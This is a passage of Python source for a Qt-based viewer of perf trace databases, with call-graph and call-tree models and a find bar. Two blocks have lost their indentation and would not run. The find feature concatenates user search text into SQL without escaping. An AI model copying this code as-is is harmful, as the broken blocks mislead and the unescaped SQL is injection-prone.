# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import argparse
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
# Prefer PySide2 (Qt5); fall back to PySide (Qt4) when PySide2 is missing
# or when the user forces it with --pyside-version-1.
pyside_version_1 = True
if not "--pyside-version-1" in sys.argv:
    try:
        from PySide2.QtCore import *
        from PySide2.QtGui import *
        from PySide2.QtSql import *
        from PySide2.QtWidgets import *
        pyside_version_1 = False
    except:
        # NOTE(review): bare except deliberately swallows any PySide2 import
        # failure so the PySide fallback below is used.
        pass
if pyside_version_1:
    from PySide.QtCore import *
    from PySide.QtGui import *
    from PySide.QtSql import *
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
    xrange
except NameError:
    xrange = range
def printerr(*args, **keyword_args):
    """Like print(), but writing to standard error."""
    print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
    """Format a (possibly negative) value as unsigned 64-bit hex."""
    value = ip + (1 << 64) if ip < 0 else ip
    return "%x" % value
def offstr(offset):
    """Render a symbol offset like '+0x1f', or '' for a zero offset."""
    return "+0x%x" % offset if offset else ""
def dsoname(name):
    """Shorten the kernel DSO name for display; pass others through."""
    return "[kernel]" if name == "[kernel.kallsyms]" else name
def findnth(s, sub, n, offs=0):
    """Return the index of the n-th occurrence of *sub* in *s* (plus the
    caller-supplied base offset *offs*), or a negative value if there are
    fewer than n occurrences."""
    while True:
        pos = s.find(sub)
        if pos < 0:
            # Note: the raw (un-offset) failure value is returned, matching
            # str.find's -1 convention.
            return pos
        if n <= 1:
            return offs + pos
        # Skip past this occurrence and keep counting.
        s = s[pos + 1:]
        n -= 1
        offs += pos + 1
# Percent to one decimal place
def PercentToOneDP(n, d):
    """Return n/d as a percentage string with exactly one decimal place
    (half-up rounding); '0.0' when the denominator is zero/falsy."""
    if not d:
        return "0.0"
    pct = (n * Decimal(100)) / d
    return str(pct.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
    """Execute *stmt* on *query*; raise (with the SQL error text) on
    failure. For queries that must not fail."""
    if not query.exec_(stmt):
        raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
    """Background worker that repeatedly runs *task* (optionally with a
    fixed parameter) and emits each result via the `done` signal, stopping
    once the task reports completion."""
    done = Signal(object)
    def __init__(self, task, param=None, parent=None):
        super(Thread, self).__init__(parent)
        self.task = task
        self.param = param
    def run(self):
        finished = False
        while not finished:
            if self.param is None:
                finished, result = self.task()
            else:
                finished, result = self.task(self.param)
            # Emit the (possibly partial) result before deciding to stop.
            self.done.emit(result)
# Tree data model
class TreeModel(QAbstractItemModel):
    """Qt item model for lazily-populated trees.

    Subclasses supply GetRoot()/columnHeader()/columnAlignment(); tree
    items expose childCount()/hasChildren()/getData()/getRow() etc.
    """
    def __init__(self, glb, params, parent=None):
        super(TreeModel, self).__init__(parent)
        self.glb = glb
        self.params = params
        self.root = self.GetRoot()
        self.last_row_read = 0
    def Item(self, parent):
        # Map a QModelIndex to its item; an invalid index means the root.
        if parent.isValid():
            return parent.internalPointer()
        else:
            return self.root
    def rowCount(self, parent):
        result = self.Item(parent).childCount()
        if result < 0:
            # childCount() returns -1 the first time an item turns out to
            # have no children; report 0 and emit dataChanged so the view
            # refreshes the (now resolved) item.
            result = 0
            self.dataChanged.emit(parent, parent)
        return result
    def hasChildren(self, parent):
        return self.Item(parent).hasChildren()
    def headerData(self, section, orientation, role):
        # Only horizontal display/alignment roles are provided.
        if role == Qt.TextAlignmentRole:
            return self.columnAlignment(section)
        if role != Qt.DisplayRole:
            return None
        if orientation != Qt.Horizontal:
            return None
        return self.columnHeader(section)
    def parent(self, child):
        child_item = child.internalPointer()
        if child_item is self.root:
            # The root itself has no parent index.
            return QModelIndex()
        parent_item = child_item.getParentItem()
        return self.createIndex(parent_item.getRow(), 0, parent_item)
    def index(self, row, column, parent):
        child_item = self.Item(parent).getChildItem(row)
        return self.createIndex(row, column, child_item)
    def DisplayData(self, item, index):
        return item.getData(index.column())
    def FetchIfNeeded(self, row):
        # Ask the fetcher for another chunk once the view approaches the
        # end of what has been read so far.
        # NOTE(review): self.fetcher and glb_chunk_sz are defined elsewhere
        # in the file -- only models that set a fetcher may call this.
        if row > self.last_row_read:
            self.last_row_read = row
            if row + 10 >= self.root.child_count:
                self.fetcher.Fetch(glb_chunk_sz)
    def columnAlignment(self, column):
        # Default alignment; subclasses override per column.
        return Qt.AlignLeft
    def columnFont(self, column):
        return None
    def data(self, index, role):
        if role == Qt.TextAlignmentRole:
            return self.columnAlignment(index.column())
        if role == Qt.FontRole:
            return self.columnFont(index.column())
        if role != Qt.DisplayRole:
            return None
        item = index.internalPointer()
        return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
    """Qt table model over a flat list of row items, populated
    incrementally (see FetchIfNeeded)."""
    def __init__(self, parent=None):
        super(TableModel, self).__init__(parent)
        self.child_count = 0
        self.child_items = []
        self.last_row_read = 0
    def Item(self, parent):
        # An invalid index refers to the model itself (the "root").
        if parent.isValid():
            return parent.internalPointer()
        else:
            return self
    def rowCount(self, parent):
        return self.child_count
    def headerData(self, section, orientation, role):
        if role == Qt.TextAlignmentRole:
            return self.columnAlignment(section)
        if role != Qt.DisplayRole:
            return None
        if orientation != Qt.Horizontal:
            return None
        return self.columnHeader(section)
    def index(self, row, column, parent):
        return self.createIndex(row, column, self.child_items[row])
    def DisplayData(self, item, index):
        return item.getData(index.column())
    def FetchIfNeeded(self, row):
        # Request another chunk when the view nears the end of loaded rows.
        # NOTE(review): self.fetcher and glb_chunk_sz are defined elsewhere
        # in the file -- only models that set a fetcher may call this.
        if row > self.last_row_read:
            self.last_row_read = row
            if row + 10 >= self.child_count:
                self.fetcher.Fetch(glb_chunk_sz)
    def columnAlignment(self, column):
        # Default alignment; subclasses override per column.
        return Qt.AlignLeft
    def columnFont(self, column):
        return None
    def data(self, index, role):
        if role == Qt.TextAlignmentRole:
            return self.columnAlignment(index.column())
        if role == Qt.FontRole:
            return self.columnFont(index.column())
        if role != Qt.DisplayRole:
            return None
        item = index.internalPointer()
        return self.DisplayData(item, index)
# Model cache
# Cache of data models keyed by name; weak values let unused models be
# garbage collected once no view references them.
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()

def LookupCreateModel(model_name, create_fn):
    """Return the cached model for *model_name*, creating it with
    *create_fn* on a cache miss. Thread-safe.

    Fixes over the original: the lock is released even when create_fn
    raises (the bare acquire/release pair leaked the lock on exception,
    deadlocking every later lookup), and only a missing key — not any
    arbitrary error — is treated as a cache miss.
    """
    with model_cache_lock:
        try:
            model = model_cache[model_name]
        except KeyError:
            model = create_fn()
            model_cache[model_name] = model
    return model
# Find bar
class FindBar():
    """Composite "find" widget: an editable combo box with history, a
    pattern checkbox, next/prev/close buttons and a busy progress bar.
    Drives a *finder* object implementing
    Find(value, direction, pattern, context).
    """
    def __init__(self, parent, finder, is_reg_expr=False):
        self.finder = finder
        # Opaque search context owned by the finder (see Find below).
        self.context = []
        self.last_value = None
        self.last_pattern = None
        label = QLabel("Find:")
        label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
        self.textbox = QComboBox()
        self.textbox.setEditable(True)
        self.textbox.currentIndexChanged.connect(self.ValueChanged)
        # Range (0, 0) makes the progress bar an indeterminate "busy" bar.
        self.progress = QProgressBar()
        self.progress.setRange(0, 0)
        self.progress.hide()
        if is_reg_expr:
            self.pattern = QCheckBox("Regular Expression")
        else:
            self.pattern = QCheckBox("Pattern")
        self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
        self.next_button = QToolButton()
        self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
        self.next_button.released.connect(lambda: self.NextPrev(1))
        self.prev_button = QToolButton()
        self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
        self.prev_button.released.connect(lambda: self.NextPrev(-1))
        self.close_button = QToolButton()
        self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
        self.close_button.released.connect(self.Deactivate)
        self.hbox = QHBoxLayout()
        self.hbox.setContentsMargins(0, 0, 0, 0)
        self.hbox.addWidget(label)
        self.hbox.addWidget(self.textbox)
        self.hbox.addWidget(self.progress)
        self.hbox.addWidget(self.pattern)
        self.hbox.addWidget(self.next_button)
        self.hbox.addWidget(self.prev_button)
        self.hbox.addWidget(self.close_button)
        self.bar = QWidget()
        self.bar.setLayout(self.hbox)
        self.bar.hide()
    def Widget(self):
        # The widget the owner embeds into its layout.
        return self.bar
    def Activate(self):
        # Show the bar and put the cursor in the search box, text selected.
        self.bar.show()
        self.textbox.lineEdit().selectAll()
        self.textbox.setFocus()
    def Deactivate(self):
        self.bar.hide()
    def Busy(self):
        # Swap the controls for the busy indicator while a search runs.
        self.textbox.setEnabled(False)
        self.pattern.hide()
        self.next_button.hide()
        self.prev_button.hide()
        self.progress.show()
    def Idle(self):
        # Restore the controls once the search completes.
        self.textbox.setEnabled(True)
        self.progress.hide()
        self.pattern.show()
        self.next_button.show()
        self.prev_button.show()
    def Find(self, direction):
        # Remember what was searched so NextPrev can detect changes.
        value = self.textbox.currentText()
        pattern = self.pattern.isChecked()
        self.last_value = value
        self.last_pattern = pattern
        self.finder.Find(value, direction, pattern, self.context)
    def ValueChanged(self):
        value = self.textbox.currentText()
        pattern = self.pattern.isChecked()
        index = self.textbox.currentIndex()
        data = self.textbox.itemData(index)
        # Store the pattern in the combo box to keep it with the text value
        if data == None:
            self.textbox.setItemData(index, pattern)
        else:
            self.pattern.setChecked(data)
        self.Find(0)
    def NextPrev(self, direction):
        value = self.textbox.currentText()
        pattern = self.pattern.isChecked()
        if value != self.last_value:
            index = self.textbox.findText(value)
            # Allow for a button press before the value has been added to the combo box
            if index < 0:
                index = self.textbox.count()
                self.textbox.addItem(value, pattern)
                self.textbox.setCurrentIndex(index)
                return
            else:
                self.textbox.setItemData(index, pattern)
        elif pattern != self.last_pattern:
            # Keep the pattern recorded in the combo box up to date
            index = self.textbox.currentIndex()
            self.textbox.setItemData(index, pattern)
        self.Find(direction)
    def NotFound(self):
        QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
    """Base for all call-graph tree items: child bookkeeping plus lazy
    population (children are queried on first childCount() call)."""
    def __init__(self, glb, params, row, parent_item):
        self.glb = glb
        self.params = params
        self.row = row
        self.parent_item = parent_item
        # False until Select() has run and populated child_items.
        self.query_done = False
        self.child_count = 0
        self.child_items = []
        if parent_item:
            self.level = parent_item.level + 1
        else:
            self.level = 0
    def getChildItem(self, row):
        return self.child_items[row]
    def getParentItem(self):
        return self.parent_item
    def getRow(self):
        return self.row
    def childCount(self):
        if not self.query_done:
            # Lazily run the subclass's SELECT on first access.
            self.Select()
            if not self.child_count:
                # -1 signals "just resolved to empty" so TreeModel.rowCount
                # can emit dataChanged for this item.
                return -1
        return self.child_count
    def hasChildren(self):
        # Before the query runs, optimistically claim children so the view
        # shows an expander.
        if not self.query_done:
            return True
        return self.child_count > 0
    def getData(self, column):
        return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
    """Call-graph item for thread level and below: knows its comm, thread
    and call path, and selects its children (callees) from the calls table."""
    def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
        super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
        self.comm_id = comm_id
        self.thread_id = thread_id
        self.call_path_id = call_path_id
        self.insn_cnt = insn_cnt
        self.cyc_cnt = cyc_cnt
        self.branch_count = branch_count
        self.time = time
    def Select(self):
        self.query_done = True
        query = QSqlQuery(self.glb.db)
        # Only request instruction/cycle sums when the schema has them.
        if self.params.have_ipc:
            ipc_str = ", SUM(insn_count), SUM(cyc_count)"
        else:
            ipc_str = ""
        # One row per distinct callee call path of this item, aggregated
        # over all its calls within this comm/thread.
        QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time)" + ipc_str + ", SUM(branch_count)"
                    " FROM calls"
                    " INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
                    " INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
                    " INNER JOIN dsos ON symbols.dso_id = dsos.id"
                    " WHERE parent_call_path_id = " + str(self.call_path_id) +
                    " AND comm_id = " + str(self.comm_id) +
                    " AND thread_id = " + str(self.thread_id) +
                    " GROUP BY call_path_id, name, short_name"
                    " ORDER BY call_path_id")
        while query.next():
            # Result column positions shift depending on whether the ipc
            # columns were selected above.
            if self.params.have_ipc:
                insn_cnt = int(query.value(5))
                cyc_cnt = int(query.value(6))
                branch_count = int(query.value(7))
            else:
                insn_cnt = 0
                cyc_cnt = 0
                branch_count = int(query.value(5))
            child_item = CallGraphLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
            self.child_items.append(child_item)
            self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
    """Function-level call-graph row: formats its display columns, with
    percentages computed relative to the parent item's totals."""
    def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
        super(CallGraphLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
        dso = dsoname(dso)
        if self.params.have_ipc:
            insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
            cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
            br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
            ipc = CalcIPC(cyc_cnt, insn_cnt)
            self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
        else:
            self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
        self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
    """Thread-level call-graph row ("pid:tid"). Totals start at zero and
    are accumulated from the children when Select() runs; call_path_id 1
    is the root call path."""
    def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
        super(CallGraphLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 1, 0, 0, 0, 0, parent_item)
        if self.params.have_ipc:
            self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
        else:
            self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
        self.dbid = thread_id
    def Select(self):
        super(CallGraphLevelTwoItem, self).Select()
        # First pass: accumulate this thread's totals from its children.
        for child_item in self.child_items:
            self.time += child_item.time
            self.insn_cnt += child_item.insn_cnt
            self.cyc_cnt += child_item.cyc_cnt
            self.branch_count += child_item.branch_count
        # Second pass: now that totals are known, fill in each child's
        # percentage columns (positions differ with have_ipc).
        for child_item in self.child_items:
            child_item.data[4] = PercentToOneDP(child_item.time, self.time)
            if self.params.have_ipc:
                child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
                child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
                child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
            else:
                child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
    """Top-level call-graph row: a command (comm). Children are that
    command's threads."""
    def __init__(self, glb, params, row, comm_id, comm, parent_item):
        super(CallGraphLevelOneItem, self).__init__(glb, params, row, parent_item)
        if self.params.have_ipc:
            self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
        else:
            self.data = [comm, "", "", "", "", "", ""]
        self.dbid = comm_id
    def Select(self):
        self.query_done = True
        query = QSqlQuery(self.glb.db)
        # One child per thread that ran under this comm.
        QueryExec(query, "SELECT thread_id, pid, tid"
                    " FROM comm_threads"
                    " INNER JOIN threads ON thread_id = threads.id"
                    " WHERE comm_id = " + str(self.dbid))
        while query.next():
            child_item = CallGraphLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
            self.child_items.append(child_item)
            self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallGraphRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = TRUE"
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call graph model parameters
class CallGraphModelParams():
    """Feature flags shared by the call-graph models."""
    def __init__(self, glb, parent=None):
        # True when the database schema includes per-call instruction and
        # cycle counts (insn_count / cyc_count columns on the calls table).
        self.have_ipc = IsSelectable(glb.db, "calls", columns = "insn_count, cyc_count")
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
    """Base for context-sensitive call-graph models: adds find support
    (exact match, or SQL LIKE/GLOB wildcard patterns with * and ?) run on
    a background thread so the UI stays responsive."""
    def __init__(self, glb, parent=None):
        super(CallGraphModelBase, self).__init__(glb, CallGraphModelParams(glb), parent)
    def FindSelect(self, value, pattern, query):
        """Build and run the find SELECT; *pattern* selects wildcard
        matching instead of exact equality."""
        if pattern:
            # postgresql and sqlite pattern matching differences:
            # postgresql LIKE is case sensitive but sqlite LIKE is not
            # postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
            # postgresql supports ILIKE which is case insensitive
            # sqlite supports GLOB (text only) which uses * and ? and is case sensitive
            if not self.glb.dbref.is_sqlite3:
                # Escape % and _ (escaped backslashes; the original "\%"
                # relied on an invalid escape sequence)
                s = value.replace("%", "\\%")
                s = s.replace("_", "\\_")
                # Translate * and ? into SQL LIKE pattern characters % and _
                try:
                    # Python 2
                    trans = string.maketrans("*?", "%_")
                except AttributeError:
                    # Python 3: string.maketrans was removed; it lives on str
                    trans = str.maketrans("*?", "%_")
                match = " LIKE '" + str(s).translate(trans) + "'"
            else:
                match = " GLOB '" + str(value) + "'"
        else:
            match = " = '" + str(value) + "'"
        self.DoFindSelect(query, match)
    def Found(self, query, found):
        # Convert a query hit into a path of database ids (or [] for a miss).
        if found:
            return self.FindPath(query)
        return []
    def FindValue(self, value, pattern, query, last_value, last_pattern):
        # Re-use the existing result set when the search terms are unchanged.
        if last_value == value and pattern == last_pattern:
            found = query.first()
        else:
            self.FindSelect(value, pattern, query)
            found = query.next()
        return self.Found(query, found)
    def FindNext(self, query):
        # Wrap around to the first result when stepping past the end.
        found = query.next()
        if not found:
            found = query.first()
        return self.Found(query, found)
    def FindPrev(self, query):
        # Wrap around to the last result when stepping before the start.
        found = query.previous()
        if not found:
            found = query.last()
        return self.Found(query, found)
    def FindThread(self, c):
        # Runs on the worker thread with the search Context *c*.
        if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
            ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
        elif c.direction > 0:
            ids = self.FindNext(c.query)
        else:
            ids = self.FindPrev(c.query)
        return (True, ids)
    def Find(self, value, direction, pattern, context, callback):
        """Start (or continue) a find; *callback* receives the id path."""
        class Context():
            def __init__(self, *x):
                self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
            def Update(self, *x):
                # Shift current value/pattern into last_*, install the new ones.
                self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
        if len(context):
            context[0].Update(value, direction, pattern)
        else:
            context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
        # Use a thread so the UI is not blocked during the SELECT
        thread = Thread(self.FindThread, context[0])
        thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
        thread.start()
    def FindDone(self, thread, callback, ids):
        callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
    """Context-sensitive call graph model: comm -> thread -> call path levels."""
    def __init__(self, glb, parent=None):
        super(CallGraphModel, self).__init__(glb, parent)
    def GetRoot(self):
        return CallGraphRootItem(self.glb, self.params)
    def columnCount(self, parent=None):
        # Extra columns when instruction / cycle counts (IPC) are available
        if self.params.have_ipc:
            return 12
        else:
            return 7
    def columnHeader(self, column):
        if self.params.have_ipc:
            headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
        else:
            headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
        return headers[column]
    def columnAlignment(self, column):
        if self.params.have_ipc:
            alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
        else:
            alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
        return alignment[column]
    def DoFindSelect(self, query, match):
        """Select the (call_path, comm, thread) tuples whose symbol name matches."""
        QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
            " FROM calls"
            " INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
            " INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
            " WHERE symbols.name" + match +
            " GROUP BY comm_id, thread_id, call_path_id"
            " ORDER BY comm_id, thread_id, call_path_id")
    def FindPath(self, query):
        # Turn the query result into a list of ids that the tree view can walk
        # to open the tree at the right place.
        ids = []
        parent_id = query.value(0)
        # Walk the call path ancestry up to the root
        while parent_id:
            ids.insert(0, parent_id)
            q2 = QSqlQuery(self.glb.db)
            QueryExec(q2, "SELECT parent_id"
                " FROM call_paths"
                " WHERE id = " + str(parent_id))
            if not q2.next():
                break
            parent_id = q2.value(0)
        # The call path root is not used
        if ids[0] == 1:
            del ids[0]
        # Prepend thread id and comm id to match the tree levels
        ids.insert(0, query.value(2))
        ids.insert(0, query.value(1))
        return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
    """Base for call tree items at level two and below.

    calls_id == 0 denotes a level two (thread) item, which selects the
    top-level calls of the comm/thread instead of the children of one call.
    """
    def __init__(self, glb, params, row, comm_id, thread_id, calls_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
        super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
        self.comm_id = comm_id
        self.thread_id = thread_id
        self.calls_id = calls_id
        self.insn_cnt = insn_cnt
        self.cyc_cnt = cyc_cnt
        self.branch_count = branch_count
        self.time = time
    def Select(self):
        """Lazily populate the children: the calls made by this call."""
        self.query_done = True
        if self.calls_id == 0:
            # Top level of a thread: restrict by comm and thread instead of parent call
            comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
        else:
            comm_thread = ""
        if self.params.have_ipc:
            ipc_str = ", insn_count, cyc_count"
        else:
            ipc_str = ""
        query = QSqlQuery(self.glb.db)
        QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time" + ipc_str + ", branch_count"
            " FROM calls"
            " INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
            " INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
            " INNER JOIN dsos ON symbols.dso_id = dsos.id"
            " WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
            " ORDER BY call_time, calls.id")
        while query.next():
            # Column positions shift depending on whether ipc_str was selected
            if self.params.have_ipc:
                insn_cnt = int(query.value(5))
                cyc_cnt = int(query.value(6))
                branch_count = int(query.value(7))
            else:
                insn_cnt = 0
                cyc_cnt = 0
                branch_count = int(query.value(5))
            child_item = CallTreeLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
            self.child_items.append(child_item)
            self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
    """Call tree item for an individual call (level three and below)."""
    def __init__(self, glb, params, row, comm_id, thread_id, calls_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
        super(CallTreeLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, calls_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
        dso = dsoname(dso)
        if self.params.have_ipc:
            # Percentages are relative to the parent item's totals
            insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
            cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
            br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
            ipc = CalcIPC(cyc_cnt, insn_cnt)
            self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
        else:
            self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
        self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
    """Call tree item for a thread (level two); totals are derived from children."""
    def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
        super(CallTreeLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 0, 0, 0, 0, 0, parent_item)
        if self.params.have_ipc:
            self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
        else:
            self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
        self.dbid = thread_id
    def Select(self):
        super(CallTreeLevelTwoItem, self).Select()
        # First pass: accumulate this thread's totals over its children
        for child_item in self.child_items:
            self.time += child_item.time
            self.insn_cnt += child_item.insn_cnt
            self.cyc_cnt += child_item.cyc_cnt
            self.branch_count += child_item.branch_count
        # Second pass: now that the totals are known, fill in each child's
        # percentage columns
        for child_item in self.child_items:
            child_item.data[4] = PercentToOneDP(child_item.time, self.time)
            if self.params.have_ipc:
                child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
